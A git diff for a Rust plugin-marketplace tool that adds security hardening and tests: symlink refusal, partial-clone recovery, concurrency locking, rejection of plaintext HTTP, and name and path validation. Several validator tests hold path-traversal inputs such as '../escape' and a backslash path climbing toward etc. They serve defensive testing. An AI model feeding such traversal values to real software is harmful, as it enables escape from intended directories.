+                crate::validation::RelativePath::new("./plugins").unwrap(),
+            ),
+        };
+
+        let err = svc
+            .resolve_plugin_dir(&entry, &marketplace_path, "mp", GitProtocol::Https)
+            .expect_err("symlink must be refused");
+        assert!(
+            matches!(err, Error::Plugin(PluginError::DirectoryMissing { .. })),
+            "expected DirectoryMissing for symlinked path, got: {err:?}"
+        );
+    }
+
+    #[test]
+    fn resolve_structured_source_recovers_from_partial_clone() {
+        // Regression: if a prior clone crashed mid-way, `dest` exists
+        // but `.git/` is missing — earlier code treated the partial
+        // directory as a valid cached clone and returned it without
+        // re-cloning, so the install would proceed with whatever
+        // half-fetched files happened to be on disk. The resolver must
+        // detect the partial state via `.git/` absence, wipe it, and
+        // re-clone.
+        let (_dir, svc) = temp_service();
+        svc.cache.ensure_dirs().unwrap();
+
+        let dest = svc.cache.plugin_path("mp", "mock-plugin");
+        fs::create_dir_all(&dest).unwrap();
+        fs::write(dest.join("stale.txt"), b"left over from crash").unwrap();
+        assert!(
+            !dest.join(".git").exists(),
+            "fixture: pre-partial-clone dir must not contain .git/"
+        );
+
+        let entry = PluginEntry {
+            name: "mock-plugin".to_string(),
+            description: None,
+            source: PluginSource::Structured(StructuredSource::GitHub {
+                repo: "owner/repo".to_string(),
+                git_ref: None,
+                sha: None,
+            }),
+        };
+
+        let resolved = svc
+            .resolve_plugin_dir(&entry, Path::new("/unused"), "mp", GitProtocol::Https)
+            .expect("partial clone should be recovered and cloned fresh");
+
+        assert_eq!(resolved, dest);
+        assert!(
+            resolved.join(".git/HEAD").exists(),
+            "fresh clone must have replaced partial dir"
+        );
+        assert!(
+            !resolved.join("stale.txt").exists(),
+            "stale file from partial clone must be removed"
+        );
+    }
+
+    #[test]
+    fn resolve_structured_source_reuses_complete_clone() {
+        // Sanity check: a directory with `.git/` is treated as a valid
+        // cached clone and re-used without re-calling clone_repo.
+        let (_dir, svc) = temp_service();
+        svc.cache.ensure_dirs().unwrap();
+
+        let entry = PluginEntry {
+            name: "mock-plugin".to_string(),
+            description: None,
+            source: PluginSource::Structured(StructuredSource::GitHub {
+                repo: "owner/repo".to_string(),
+                git_ref: None,
+                sha: None,
+            }),
+        };
+
+        // First call triggers a clone.
+        svc.resolve_plugin_dir(&entry, Path::new("/unused"), "mp", GitProtocol::Https)
+            .expect("first resolve");
+        // Mark a distinguishing file so we can assert it survives the
+        // second call (i.e. no re-clone happened).
+        let dest = svc.cache.plugin_path("mp", "mock-plugin");
+        fs::write(dest.join("sentinel.txt"), b"should survive").unwrap();
+
+        svc.resolve_plugin_dir(&entry, Path::new("/unused"), "mp", GitProtocol::Https)
+            .expect("second resolve");
+
+        assert!(
+            dest.join("sentinel.txt").exists(),
+            "complete clone must be reused, not re-cloned"
+        );
     }
 
     // No explicit test for "programmatic GitSubdir.path traversal" is
@@ -1908,6 +2429,150 @@ mod tests {
     }
 
     #[test]
+    fn add_serializes_concurrent_same_name_adds() {
+        // Many threads racing to add the same marketplace name. Without
+        // the outer registry lock spanning existence-check + rename +
+        // register, multiple threads could pass `final_dir.exists()` and
+        // race the rename — leaving losers with confusing IO errors and
+        // potentially clobbered final_dir content. With the lock, exactly
+        // one thread wins with Ok and every other gets AlreadyRegistered.
+        //
+        // Fanout 8 (was 2): a broken lock that just happens to win the
+        // race on a 2-thread fight passes the smaller test. Eight
+        // contenders make the failure mode visible.
+        const FANOUT: usize = 8;
+        let (_dir, svc) = temp_service();
+        let svc = std::sync::Arc::new(svc);
+
+        let barrier = std::sync::Arc::new(std::sync::Barrier::new(FANOUT));
+
+        let handles: Vec<_> = (0..FANOUT)
+            .map(|_| {
+                let svc = std::sync::Arc::clone(&svc);
+                let barrier = std::sync::Arc::clone(&barrier);
+                std::thread::spawn(move || {
+                    barrier.wait();
+                    svc.add("owner/repo", GitProtocol::Https)
+                })
+            })
+            .collect();
+
+        let results: Vec<_> = handles.into_iter().map(|h| h.join().unwrap()).collect();
+        let ok_count = results.iter().filter(|r| r.is_ok()).count();
+        let already_count = results
+            .iter()
+            .filter(|r| {
+                matches!(
+                    r,
+                    Err(Error::Marketplace(
+                        MarketplaceError::AlreadyRegistered { .. }
+                    ))
+                )
+            })
+            .count();
+        assert_eq!(ok_count, 1, "exactly one concurrent add should succeed");
+        assert_eq!(
+            already_count,
+            FANOUT - 1,
+            "every loser must surface AlreadyRegistered, not a generic IO error: {:?}",
+            results
+                .iter()
+                .filter_map(|r| r.as_ref().err().map(ToString::to_string))
+                .collect::<Vec<_>>()
+        );
+
+        // No `_pending_*` staging dirs may leak. Both threads create their
+        // own pid+seq-suffixed temp dir; the loser's dir must be cleaned up
+        // by the DirCleanupGuard before its add() returns.
+        let marketplaces_dir = svc.cache.marketplaces_dir();
+        let leftovers: Vec<_> = fs::read_dir(&marketplaces_dir)
+            .unwrap()
+            .filter_map(Result::ok)
+            .filter(|e| e.file_name().to_string_lossy().starts_with("_pending_"))
+            .collect();
+        assert!(
+            leftovers.is_empty(),
+            "no _pending_ staging dirs should remain after a concurrent add race"
+        );
+
+        // The winner's marketplace is registered exactly once.
+        let known = svc.list().expect("list");
+        assert_eq!(known.len(), 1);
+        assert_eq!(known[0].name, "mock-market");
+    }
+
+    #[test]
+    fn add_and_remove_race_leaves_consistent_state() {
+        // Concurrent add(mock-market) + remove(mock-market). The two
+        // operations both take the registry lock — they must serialise
+        // without leaving the cache half-deleted, half-registered. Either:
+        //   - add wins first, then remove succeeds (registry empty, dir gone)
+        //   - remove runs first (NotFound), then add succeeds (registry has 1)
+        // Importantly: never both registered AND directory deleted.
+        let (_dir, svc) = temp_service();
+        let svc = std::sync::Arc::new(svc);
+        // Pre-add so remove has something to race against.
+        svc.add("owner/repo", GitProtocol::Https)
+            .expect("seed marketplace");
+
+        let barrier = std::sync::Arc::new(std::sync::Barrier::new(2));
+        let svc_a = std::sync::Arc::clone(&svc);
+        let bar_a = std::sync::Arc::clone(&barrier);
+        let svc_r = std::sync::Arc::clone(&svc);
+        let bar_r = std::sync::Arc::clone(&barrier);
+
+        // Thread A: re-add (collides with the existing entry → AlreadyRegistered
+        // unless remove runs first → succeeds).
+        let h_add = std::thread::spawn(move || {
+            bar_a.wait();
+            svc_a.add("owner/repo", GitProtocol::Https)
+        });
+        // Thread R: remove (succeeds unless add hasn't completed yet, in
+        // which case... well, the seed already ran, so it must succeed).
+        let h_rm = std::thread::spawn(move || {
+            bar_r.wait();
+            svc_r.remove("mock-market")
+        });
+
+        let add_result = h_add.join().unwrap();
+        let rm_result = h_rm.join().unwrap();
+
+        // After serialisation, the registry must be in one of the two
+        // valid steady states:
+        //   - empty (remove won the race): add returned AlreadyRegistered
+        //     IF it ran before remove, OR succeeded if it ran after.
+        //   - has the marketplace (add re-added after remove): remove
+        //     succeeded, then add succeeded.
+        let known = svc.list().expect("list");
+        match known.len() {
+            0 => {
+                // Remove ran last. Add must have returned AlreadyRegistered
+                // (which it did before remove). Either result is acceptable.
+                assert!(
+                    rm_result.is_ok(),
+                    "remove must have succeeded: {rm_result:?}"
+                );
+            }
+            1 => {
+                // Add ran last → registered marketplace dir must exist.
+                assert_eq!(known[0].name, "mock-market");
+                assert!(
+                    svc.cache.marketplace_path("mock-market").exists(),
+                    "registered marketplace must have its on-disk dir"
+                );
+                assert!(
+                    add_result.is_ok(),
+                    "add must have succeeded: {add_result:?}"
+                );
+            }
+            n => panic!(
+                "registry must end with 0 or 1 entries after add/remove race, got {n}: \
+                 add={add_result:?}, rm={rm_result:?}"
+            ),
+        }
+    }
+
+    #[test]
     fn remove_marketplace_cleans_up() {
         let (_dir, svc) = temp_service();
         svc.add("owner/repo", GitProtocol::Https).expect("add");
@@ -1952,6 +2617,60 @@ mod tests {
         let known = svc.list().expect("list");
 
         assert!(known.is_empty());
+    }
+
+    #[test]
+    fn add_rejects_http_url_by_default() {
+        // Plaintext HTTP is unauthenticated. Without TLS a network
+        // attacker can swap the marketplace contents and gain
+        // long-lived code execution via skills/agents/MCP servers
+        // that the cache then keeps. The default rejects with
+        // InsecureSource so users have to explicitly opt in.
+        let (_dir, svc) = temp_service();
+        let err = svc
+            .add("http://example.com/repo.git", GitProtocol::Https)
+            .expect_err("http:// must be rejected by default");
+        assert!(
+            matches!(
+                err,
+                Error::Marketplace(MarketplaceError::InsecureSource { .. })
+            ),
+            "expected InsecureSource, got {err:?}"
+        );
+        // The error names the opt-in knob so the user knows the workaround.
+        let msg = err.to_string();
+        assert!(
+            msg.contains("http://") && msg.contains("allow-insecure-http"),
+            "error must point at the remediation: {msg}"
+        );
+    }
+
+    #[test]
+    fn add_accepts_http_url_when_explicitly_opted_in() {
+        // Setting InsecureHttpPolicy::Allow MUST let http:// proceed.
+        // Plumbed end-to-end so a CLI flag like --allow-insecure-http or
+        // a Tauri checkbox can flip it.
+        let (_dir, svc) = temp_service();
+        let result = svc.add(
+            "http://example.com/repo.git",
+            MarketplaceAddOptions::new(GitProtocol::Https).allow_insecure_http(),
+        );
+        // The mock backend will succeed regardless of URL scheme; we're
+        // proving here that the http guard does not fire when opted in.
+        assert!(
+            result.is_ok(),
+            "opted-in http:// add should succeed against the mock, got {result:?}"
+        );
+    }
+
+    #[test]
+    fn add_accepts_https_url_without_opt_in() {
+        // The strict default must NOT reject `https://`; only `http://`
+        // is gated. Otherwise we'd block the common case (a private git
+        // server with a TLS cert).
+        let (_dir, svc) = temp_service();
+        svc.add("https://example.com/repo.git", GitProtocol::Https)
+            .expect("https:// is the safe path and must work without opt-in");
     }
 
     // -----------------------------------------------------------------------
@@ -2439,7 +3158,7 @@ mod tests {
             "expected validation error, got: {err}"
         );
 
-        // Verify no directory was left behind (TempDirGuard should clean up).
+        // Verify no directory was left behind (DirCleanupGuard should clean up).
         let marketplaces_dir = dir.path().join("marketplaces");
         if marketplaces_dir.exists() {
             let entries: Vec<_> = fs::read_dir(&marketplaces_dir)

--- a/crates/kiro-market-core/src/service.rs
+++ b/crates/kiro-market-core/src/service.rs
@@ -890,9 +890,7 @@ impl MarketplaceService {
                 // that resolves outside the marketplace tree. Matches the
                 // symlink-refuse policy in project::copy_dir_recursive,
                 // agent::discover_agents_in_dirs, and load_plugin_manifest.
-                let is_real_dir = fs::symlink_metadata(&resolved)
-                    .map(|m| m.is_dir())
-                    .unwrap_or(false);
+                let is_real_dir = fs::symlink_metadata(&resolved).is_ok_and(|m| m.is_dir());
                 if !is_real_dir {
                     return Err(PluginError::DirectoryMissing { path: resolved }.into());
                 }

--- a/crates/kiro-market-core/src/skill.rs
+++ b/crates/kiro-market-core/src/skill.rs
@@ -21,6 +21,14 @@ pub enum ParseError {
     /// The YAML between the fences could not be parsed.
     #[error("invalid YAML in frontmatter: {0}")]
     InvalidYaml(String),
+
+    /// The frontmatter parsed but the `name` field failed
+    /// [`crate::validation::validate_name`]. Reported at parse time so a
+    /// malformed SKILL.md cannot pass discovery / scanning and only fail
+    /// later when `install_skill_from_dir` re-validates: the early reject
+    /// surfaces typos and traversal attempts before any I/O is wasted.
+    #[error("invalid `name` in SKILL.md frontmatter: {0}")]
+    InvalidName(String),
 }
 
 /// Parsed YAML frontmatter from a `SKILL.md` file.
@@ -64,6 +72,19 @@ pub fn parse_frontmatter(content: &str) -> Result<(SkillFrontmatter, usize), Par
 
     let frontmatter: SkillFrontmatter =
         serde_yaml_ng::from_str(yaml_block).map_err(|e| ParseError::InvalidYaml(e.to_string()))?;
+
+    // Validate the name at parse time so downstream filesystem operations
+    // (`KiroProject::install_skill_from_dir`, `cache.write_plugin_registry`,
+    // etc.) can trust the value without re-checking — and so a SKILL.md with
+    // a traversal name fails as soon as it's read, not after a directory
+    // copy has already been started. Mirrors `parse_claude_agent` /
+    // `parse_copilot_agent`, which both validate at the same boundary.
+    crate::validation::validate_name(&frontmatter.name).map_err(|e| match e {
+        crate::error::ValidationError::InvalidName { reason, .. } => {
+            ParseError::InvalidName(reason)
+        }
+        other => ParseError::InvalidName(other.to_string()),
+    })?;
 
     // Calculate the byte offset where the body starts (after closing `---` and its newline).
     let close_fence_start =
@@ -179,5 +200,35 @@ mod tests {
             matches!(err, ParseError::InvalidYaml(_)),
             "expected InvalidYaml, got {err:?}"
         );
+    }
+
+    #[test]
+    fn parse_rejects_path_traversal_in_name() {
+        // A malicious SKILL.md cannot smuggle a `../` into the install
+        // path even before reaching install_skill_from_dir. This mirrors
+        // parse_claude_agent / parse_copilot_agent which both already
+        // validate at the parse boundary.
+        let content = "---\nname: ../escape\ndescription: bad\n---\nbody\n";
+        let err = parse_frontmatter(content).expect_err("traversal must be rejected");
+        assert!(
+            matches!(err, ParseError::InvalidName(_)),
+            "expected InvalidName for traversal, got {err:?}"
+        );
+    }
+
+    #[test]
+    fn parse_rejects_path_separator_in_name() {
+        let content = "---\nname: sub/dir\ndescription: bad\n---\nbody\n";
+        let err = parse_frontmatter(content).expect_err("separator must be rejected");
+        assert!(matches!(err, ParseError::InvalidName(_)));
+    }
+
+    #[test]
+    fn parse_rejects_windows_reserved_name() {
+        // Belt-and-braces: even if a SKILL.md sneaks `con` past the
+        // author's review, the validator catches it at parse time.
+        let content = "---\nname: con\ndescription: bad\n---\nbody\n";
+        let err = parse_frontmatter(content).expect_err("reserved name must be rejected");
+        assert!(matches!(err, ParseError::InvalidName(_)));
     }
 }

--- a/crates/kiro-market-core/src/validation.rs
+++ b/crates/kiro-market-core/src/validation.rs
@@ -311,6 +311,8 @@ where
 
 #[cfg(test)]
 mod tests {
+    use rstest::rstest;
+
     use super::*;
 
     // -----------------------------------------------------------------------
@@ -379,31 +381,33 @@ mod tests {
         );
     }
 
-    #[test]
-    fn validate_name_rejects_other_control_characters() {
-        for raw in ["foo\nbar", "alert\x07", "tab\there", "del\x7Fend"] {
-            let err = validate_name(raw).unwrap_err();
-            assert!(
-                matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("control character")),
-                "expected control-character reason for {raw:?}, got {err:?}"
-            );
-        }
+    #[rstest]
+    #[case::newline("foo\nbar")]
+    #[case::bell("alert\x07")]
+    #[case::tab("tab\there")]
+    #[case::del("del\x7Fend")]
+    fn validate_name_rejects_other_control_characters(#[case] raw: &str) {
+        let err = validate_name(raw).unwrap_err();
+        assert!(
+            matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("control character")),
+            "expected control-character reason for {raw:?}, got {err:?}"
+        );
     }
 
-    #[test]
-    fn validate_name_rejects_leading_and_trailing_space() {
-        // Leading whitespace creates folders that look empty in `ls`.
-        // Trailing whitespace is silently stripped by NTFS, aliasing two
-        // distinct names to the same on-disk directory. Tab / newline are
-        // covered by the control-character check, which fires first; the
-        // remaining ASCII-whitespace cases are leading/trailing space.
-        for raw in [" leading", "trailing "] {
-            let err = validate_name(raw).unwrap_err();
-            assert!(
-                matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("whitespace")),
-                "expected whitespace rejection for {raw:?}, got {err:?}"
-            );
-        }
+    #[rstest]
+    // Leading whitespace creates folders that look empty in `ls`.
+    // Trailing whitespace is silently stripped by NTFS, aliasing two
+    // distinct names to the same on-disk directory. Tab / newline are
+    // covered by the control-character check, which fires first; the
+    // remaining ASCII-whitespace cases are leading/trailing space.
+    #[case::leading(" leading")]
+    #[case::trailing("trailing ")]
+    fn validate_name_rejects_leading_and_trailing_space(#[case] raw: &str) {
+        let err = validate_name(raw).unwrap_err();
+        assert!(
+            matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("whitespace")),
+            "expected whitespace rejection for {raw:?}, got {err:?}"
+        );
     }
 
     #[test]
@@ -416,26 +420,23 @@ mod tests {
         );
     }
 
-    #[test]
-    fn validate_name_rejects_windows_reserved_names() {
-        for reserved in [
-            "CON",
-            "con",
-            "PRN",
-            "AUX",
-            "NUL",
-            "nul",
-            "COM1",
-            "lpt9",
-            "Con.txt",
-            "nul.tar.gz",
-        ] {
-            let err = validate_name(reserved).unwrap_err();
-            assert!(
-                matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("Windows reserved")),
-                "expected Windows-reserved rejection for {reserved:?}, got {err:?}"
-            );
-        }
+    #[rstest]
+    #[case::con_upper("CON")]
+    #[case::con_lower("con")]
+    #[case::prn("PRN")]
+    #[case::aux("AUX")]
+    #[case::nul_upper("NUL")]
+    #[case::nul_lower("nul")]
+    #[case::com1("COM1")]
+    #[case::lpt9_lower("lpt9")]
+    #[case::con_with_ext("Con.txt")]
+    #[case::nul_double_ext("nul.tar.gz")]
+    fn validate_name_rejects_windows_reserved_names(#[case] reserved: &str) {
+        let err = validate_name(reserved).unwrap_err();
+        assert!(
+            matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("Windows reserved")),
+            "expected Windows-reserved rejection for {reserved:?}, got {err:?}"
+        );
     }
 
     #[test]

--- a/crates/kiro-market-core/src/validation.rs
+++ b/crates/kiro-market-core/src/validation.rs
@@ -93,10 +93,43 @@ impl<'de> Deserialize<'de> for RelativePath {
     }
 }
 
-/// Validate that a name is safe to use as a single directory component.
+/// Names reserved by Windows for legacy device handles. Trying to create
+/// a file or directory with one of these names (with or without extension)
+/// fails on Windows in interesting ways: the OS short-circuits the path to
+/// the device, so opening `CON.txt` returns a console handle, and a folder
+/// called `NUL/` is unwritable. Reject them at the validator regardless of
+/// platform so the cache layout works the same on every host.
+const WINDOWS_RESERVED_NAMES: &[&str] = &[
+    "CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8",
+    "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
+];
+
+/// Validate that a name is safe to use as a single directory component on
+/// every platform we support.
 ///
-/// Rejects names that are empty, contain path separators (`/`, `\`),
-/// contain `..` sequences, or are exactly `.`.
+/// Rejects names that:
+/// - are empty
+/// - contain a path separator (`/`, `\`) — would split into multiple components
+/// - contain `..` — `Path::components` would surface a parent-dir component
+/// - are exactly `.` — refers to the current directory
+/// - contain a NUL byte — truncates C-string conversions in syscalls
+/// - contain any other ASCII control character (0x01..=0x1F, 0x7F) — these
+///   render as garbled or invisible bytes in logs and shells, and several
+///   filesystems reject them outright
+/// - have leading or trailing ASCII whitespace — leading whitespace makes
+///   the directory look empty in shell listings; trailing whitespace and
+///   trailing dots are silently stripped by NTFS, which would alias two
+///   apparently distinct names to the same on-disk directory
+/// - match a Windows reserved device name (CON, PRN, AUX, NUL, COM1-9,
+///   LPT1-9), comparison case-insensitive and applied to both the bare
+///   name and the stem-before-extension. The OS reserves these regardless
+///   of extension, so `nul.txt` is rejected too. This matters even on
+///   Unix because the marketplace cache may be mounted/synced to a
+///   Windows host.
+///
+/// Internal whitespace (e.g. `Terraform Agent`) is permitted because real
+/// Copilot agents use it; only the leading and trailing positions are
+/// rejected.
 ///
 /// # Errors
 ///
@@ -130,6 +163,73 @@ pub fn validate_name(name: &str) -> Result<(), ValidationError> {
         });
     }
 
+    // Control character rejection. NUL is called out separately for a
+    // clearer error message; everything else (BEL, BS, VT, ESC, DEL, …)
+    // collapses into the generic case so the user knows the byte index.
+    if let Some((idx, ch)) = name
+        .char_indices()
+        .find(|&(_, c)| c == '\0' || c.is_control())
+    {
+        let reason = if ch == '\0' {
+            "contains NUL byte".to_owned()
+        } else {
+            format!(
+                "contains control character U+{:04X} at byte {idx}",
+                ch as u32
+            )
+        };
+        return Err(ValidationError::InvalidName {
+            name: name.to_owned(),
+            reason,
+        });
+    }
+
+    if name.chars().next().is_some_and(|c| c.is_ascii_whitespace()) {
+        return Err(ValidationError::InvalidName {
+            name: name.to_owned(),
+            reason: "must not start with whitespace".into(),
+        });
+    }
+    if name
+        .chars()
+        .next_back()
+        .is_some_and(|c| c.is_ascii_whitespace())
+    {
+        return Err(ValidationError::InvalidName {
+            name: name.to_owned(),
+            reason: "must not end with whitespace".into(),
+        });
+    }
+
+    // NTFS strips trailing dots when creating files, which would silently
+    // alias `foo.` and `foo` to the same on-disk directory. Reject so the
+    // cache layout is unambiguous across platforms.
+    if name.ends_with('.') && name != "." {
+        return Err(ValidationError::InvalidName {
+            name: name.to_owned(),
+            reason: "must not end with `.`".into(),
+        });
+    }
+
+    // Windows-reserved device names. Compare both the bare name and the
+    // stem-before-first-`.` so `CON`, `con`, `Con.txt`, `con.tar.gz` are
+    // all rejected. Case-insensitive on ASCII because the reserved table
+    // is ASCII.
+    let stem = name.split('.').next().unwrap_or(name);
+    let is_reserved = |candidate: &str| {
+        WINDOWS_RESERVED_NAMES
+            .iter()
+            .any(|reserved| reserved.eq_ignore_ascii_case(candidate))
+    };
+    if is_reserved(name) || is_reserved(stem) {
+        return Err(ValidationError::InvalidName {
+            name: name.to_owned(),
+            reason: format!(
+                "matches a Windows reserved device name (`{stem}`); rename to avoid conflicts"
+            ),
+        });
+    }
+
     Ok(())
 }
 
@@ -152,6 +252,19 @@ pub fn validate_relative_path(path: &str) -> Result<(), ValidationError> {
         return Err(ValidationError::InvalidRelativePath {
             path: path.to_owned(),
             reason: "must not be an absolute path".into(),
+        });
+    }
+
+    // Reject any backslash anywhere in the path. `Path::components` treats
+    // `\` as a literal on Unix but as a separator on Windows, so a string
+    // like `sub\..\..\etc` would pass the `..` check on Unix yet traverse
+    // on Windows. Rejecting `\` at the boundary makes validation
+    // platform-independent. Legitimate relative paths in this codebase use
+    // forward slashes (see `DiscoveredPlugin::as_relative_path_string`).
+    if path.contains('\\') {
+        return Err(ValidationError::InvalidRelativePath {
+            path: path.to_owned(),
+            reason: "contains backslash (use `/` as a separator)".into(),
         });
     }
 
@@ -249,6 +362,93 @@ mod tests {
         assert!(validate_name(".hidden").is_ok());
     }
 
+    #[test]
+    fn validate_name_accepts_internal_whitespace() {
+        // "Terraform Agent" is a real Copilot agent name. Internal spaces
+        // must keep working even though leading/trailing whitespace is
+        // rejected — otherwise we'd break every Copilot multi-word agent.
+        assert!(validate_name("Terraform Agent").is_ok());
+    }
+
+    #[test]
+    fn validate_name_rejects_nul_byte() {
+        let err = validate_name("foo\0bar").unwrap_err();
+        assert!(
+            matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("NUL")),
+            "expected NUL-specific reason, got {err:?}"
+        );
+    }
+
+    #[test]
+    fn validate_name_rejects_other_control_characters() {
+        for raw in ["foo\nbar", "alert\x07", "tab\there", "del\x7Fend"] {
+            let err = validate_name(raw).unwrap_err();
+            assert!(
+                matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("control character")),
+                "expected control-character reason for {raw:?}, got {err:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn validate_name_rejects_leading_and_trailing_space() {
+        // Leading whitespace creates folders that look empty in `ls`.
+        // Trailing whitespace is silently stripped by NTFS, aliasing two
+        // distinct names to the same on-disk directory. Tab / newline are
+        // covered by the control-character check, which fires first; the
+        // remaining ASCII-whitespace cases are leading/trailing space.
+        for raw in [" leading", "trailing "] {
+            let err = validate_name(raw).unwrap_err();
+            assert!(
+                matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("whitespace")),
+                "expected whitespace rejection for {raw:?}, got {err:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn validate_name_rejects_trailing_dot() {
+        // NTFS strips trailing dots — "foo." and "foo" would alias.
+        let err = validate_name("foo.").unwrap_err();
+        assert!(
+            matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("end with `.`")),
+            "got {err:?}"
+        );
+    }
+
+    #[test]
+    fn validate_name_rejects_windows_reserved_names() {
+        for reserved in [
+            "CON",
+            "con",
+            "PRN",
+            "AUX",
+            "NUL",
+            "nul",
+            "COM1",
+            "lpt9",
+            "Con.txt",
+            "nul.tar.gz",
+        ] {
+            let err = validate_name(reserved).unwrap_err();
+            assert!(
+                matches!(&err, ValidationError::InvalidName { reason, .. } if reason.contains("Windows reserved")),
+                "expected Windows-reserved rejection for {reserved:?}, got {err:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn validate_name_accepts_names_that_merely_share_prefix_with_reserved() {
+        // "console", "auxiliary", "command" are NOT Windows reserved —
+        // only the exact device names CON, AUX, COM1 etc. are. Don't
+        // over-reject.
+        assert!(validate_name("console").is_ok());
+        assert!(validate_name("auxiliary").is_ok());
+        assert!(validate_name("command-runner").is_ok());
+        assert!(validate_name("nullable").is_ok());
+    }
+
     // -----------------------------------------------------------------------
     // validate_relative_path
     // -----------------------------------------------------------------------
@@ -300,6 +500,24 @@ mod tests {
         assert!(
             matches!(err, ValidationError::InvalidRelativePath { .. }),
             "expected InvalidRelativePath, got {err:?}"
+        );
+    }
+
+    #[test]
+    fn validate_relative_path_rejects_embedded_backslash() {
+        // Regression for a Unix/Windows asymmetry: `Path::components` treats
+        // `\` as a literal on Unix, so without explicit rejection a string
+        // like `sub\..\..\etc` would pass the `..` check on Unix but
+        // traverse on Windows or in a shell. The validator must reject any
+        // embedded backslash regardless of platform.
+        let err = validate_relative_path("sub\\..\\..\\etc").unwrap_err();
+        assert!(
+            matches!(err, ValidationError::InvalidRelativePath { .. }),
+            "expected InvalidRelativePath, got {err:?}"
+        );
+        assert!(
+            err.to_string().contains("backslash"),
+            "error should mention backslash: {err}"
         );
     }
 

--- a/crates/kiro-market/src/cli.rs
+++ b/crates/kiro-market/src/cli.rs
@@ -38,6 +38,14 @@ pub enum Command {
         /// Overwrite existing skills without prompting.
         #[arg(long)]
         force: bool,
+        /// Install agents that bring MCP servers. MCP servers run
+        /// arbitrary subprocesses (`stdio` transport) or open external
+        /// network connections (`http`/`sse`); without this opt-in
+        /// flag, MCP-bearing agents are skipped with a warning so the
+        /// user sees the risk surface before accepting it. Only set this
+        /// when you trust the agent's source and intent.
+        #[arg(long)]
+        accept_mcp: bool,
     },
     /// List all installed skills in the current project.
     List,
@@ -56,6 +64,24 @@ pub enum Command {
         /// Plugin reference in the form `plugin@marketplace`.
         plugin_ref: String,
     },
+    /// Inspect or clean up the on-disk cache.
+    Cache {
+        #[command(subcommand)]
+        action: CacheAction,
+    },
+}
+
+/// Subcommands for the `cache` command.
+#[derive(Subcommand, Debug)]
+pub enum CacheAction {
+    /// Remove cached marketplace and plugin clones whose marketplace is
+    /// no longer registered. Also sweeps any `_pending_*` staging
+    /// directories left behind by an interrupted `add`.
+    Prune {
+        /// Show what would be removed without actually deleting anything.
+        #[arg(long)]
+        dry_run: bool,
+    },
 }
 
 /// Subcommands for `marketplace` management.
@@ -68,6 +94,14 @@ pub enum MarketplaceAction {
         /// Git protocol for GitHub sources (https or ssh). Defaults to https.
         #[arg(long, value_enum, default_value_t = GitProtocol::Https)]
         protocol: GitProtocol,
+        /// Allow `http://` source URLs. Off by default — plaintext HTTP
+        /// is unauthenticated and a network attacker who substitutes the
+        /// marketplace contents gains long-lived code execution via
+        /// skills/agents/MCP servers, since the cached clone persists
+        /// after the MITM window. Pass this only on a trusted internal
+        /// network where TLS truly is not available.
+        #[arg(long)]
+        allow_insecure_http: bool,
     },
     /// List all registered marketplaces.
     List,

--- a/crates/kiro-market/src/commands/cache.rs
+++ b/crates/kiro-market/src/commands/cache.rs
@@ -1,0 +1,82 @@
+//! `cache` subcommand: inspect and clean up the on-disk cache.
+
+use anyhow::{Context, Result};
+use colored::Colorize;
+use kiro_market_core::cache::{CacheDir, PruneMode};
+
+use crate::cli::CacheAction;
+
+/// Dispatch to the appropriate cache subcommand.
+pub fn run(action: &CacheAction) -> Result<()> {
+    let cache = CacheDir::default_location()
+        .context("could not determine data directory; is $HOME set?")?;
+
+    match action {
+        CacheAction::Prune { dry_run } => {
+            let mode = if *dry_run {
+                PruneMode::DryRun
+            } else {
+                PruneMode::Apply
+            };
+            prune(&cache, mode)
+        }
+    }
+}
+
+fn prune(cache: &CacheDir, mode: PruneMode) -> Result<()> {
+    let report = cache.prune_orphans(mode).context("failed to prune cache")?;
+    let dry_run = matches!(mode, PruneMode::DryRun);
+
+    if report.targets.is_empty() && report.failed.is_empty() {
+        println!("{} cache is clean — no orphaned entries found", "✓".green());
+        return Ok(());
+    }
+
+    let verb = if dry_run { "Would remove" } else { "Removed" };
+    if !report.targets.is_empty() {
+        println!("{verb}:");
+        for path in &report.targets {
+            println!("  {} {}", "·".bold(), path.display());
+        }
+    }
+
+    if !report.failed.is_empty() {
+        println!("\n{}", "Failed:".red().bold());
+        for failure in &report.failed {
+            println!(
+                "  {} {} — {}",
+                "✗".red().bold(),
+                failure.path.display(),
+                failure.error.red()
+            );
+        }
+    }
+
+    if dry_run {
+        println!(
+            "\n{} run without --dry-run to actually delete",
+            "hint:".yellow().bold()
+        );
+    } else {
+        println!(
+            "\n{} {} entr{} cleaned up",
+            "✓".green().bold(),
+            report.targets.len(),
+            if report.targets.len() == 1 {
+                "y"
+            } else {
+                "ies"
+            }
+        );
+    }
+
+    if !report.failed.is_empty() {
+        anyhow::bail!(
+            "{} entr{} failed to delete",
+            report.failed.len(),
+            if report.failed.len() == 1 { "y" } else { "ies" }
+        );
+    }
+
+    Ok(())
+}

--- a/crates/kiro-market/src/commands/install.rs
+++ b/crates/kiro-market/src/commands/install.rs
@@ -20,8 +20,17 @@ use crate::cli;
 /// Run the install command.
 ///
 /// Resolves `plugin_ref` to a plugin, discovers skills, copies skill
-/// directories, and installs into the current Kiro project.
-pub fn run(plugin_ref: &str, skill_filter: Option<&str>, force: bool) -> Result<()> {
+/// directories, and installs into the current Kiro project. `accept_mcp`
+/// gates installation of agents that bring MCP servers — without the
+/// opt-in flag, those agents are skipped with a warning so the user can
+/// see the risk surface (subprocess execution / external network calls)
+/// before re-running with `--accept-mcp`.
+pub fn run(
+    plugin_ref: &str,
+    skill_filter: Option<&str>,
+    force: bool,
+    accept_mcp: bool,
+) -> Result<()> {
     let mode = InstallMode::from(force);
     let (plugin_name, marketplace_name) = cli::parse_plugin_ref(plugin_ref).with_context(|| {
